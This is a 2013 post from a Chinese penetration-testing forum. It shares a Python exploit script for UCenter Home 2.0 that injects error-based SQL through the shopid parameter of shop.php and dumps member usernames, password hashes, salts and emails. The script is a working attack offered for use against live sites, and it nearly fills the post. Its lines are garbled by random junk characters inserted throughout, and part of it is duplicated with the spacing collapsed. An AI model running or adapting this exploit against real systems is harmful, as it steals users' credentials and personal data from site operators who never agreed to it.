找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2556|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl6 c' O( K# C) Q, j& F5 M
! Z/ I# Q7 i# t; ]- ]) e1 u& P8 ^' d
8 q) ?9 x9 [* l" F2 M% x5 K8 h- b
#!/usr/bin/env python  
# v2 C! d( h$ ]& D9 ^! A # A- m7 ]6 e# g2 T) R1 e, `
import sys  
7 u8 G8 \) s9 [$ W, N. M! k- K% Nimport urllib2  
/ j3 n* M; J% Uimport re  7 R0 k' m' N: L& s3 C4 {  }

( }. t+ B3 a; H" `. D" Pdef info():  
" Z  G3 C; o' k  i4 n) }- ~, ]/ A    print 'From:http://www.exploit-db.com/exploits/14997/' ; T. M* o8 z! a# b; |
    print 'http://www.hake.cc/Web_loudong/'
2 F: h" z1 s; v8 `% e7 |    print 'changed:qiaoy'  ) b/ D" I) d* ?) K
    print 'exp:'  
, Z1 d5 b  F7 M0 }" X. B. l, s" J+ f    print ' ./UCenter_Home_2.0.py site'  # k- b% K/ A4 C+ T* d$ `
: X) a; I& W' e. R
def main():  : t1 Y# A" i8 o: R& s/ t2 f6 g
    if len(sys.argv) != 2:  ' G0 X* L2 Y9 j
        info()  2 `9 B7 R( z9 h$ a: g$ s4 [) ^
    else:  - e" a+ i% H8 }3 p/ ?
        site = sys.argv[1]  ! N( }6 W/ Q. ^; \; s% b. Q: z
        if site[0:7] == 'http://':  
& I" Y) T8 E# F            sitesite =site  
4 E+ H2 S1 Y1 y1 K        elif site[0:8] == 'https://':  
( J; q; G/ p& f) t            sitesite = site  
$ e. l: ?5 J# Z& {( D0 J        else:  
( z+ H# a  v7 v            site = 'http://'+site  
- i$ W9 \3 ]& D! W# O; \0 ?- S) E        try:  + C4 l1 U# }) Y: \) B
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
0 J) L! G- O$ \% F! F2 {            Value = urllib2.urlopen(url).read()  9 n! o5 \! t4 B# v) n5 O
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  * N# L- I. ]( m
            hacked = Msg.split(':')  
2 @, @$ B( f% z            print 'Name:    '+hacked[1]  ; P" A* t. r* }2 n9 N' S
            print 'Passwd:  '+hacked[2]  
' h: S" w: n& k  v0 Y9 l            print 'salt:    '+hacked[3]  
7 v! D2 v/ m; [: X7 C9 O            print 'email:   '+hacked[4]  1 R' W) S( J) Y8 V; u) I& h! L
        except:  
  h0 m, D+ U, k$ L4 Q            print 'Sorry,I can\'t work............'  
! \# @# {/ l$ k% ?+ v1 v4 f # P7 ]) Y$ R3 D
if __name__ == '__main__':  & W3 U" G4 S4 v. A  K
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表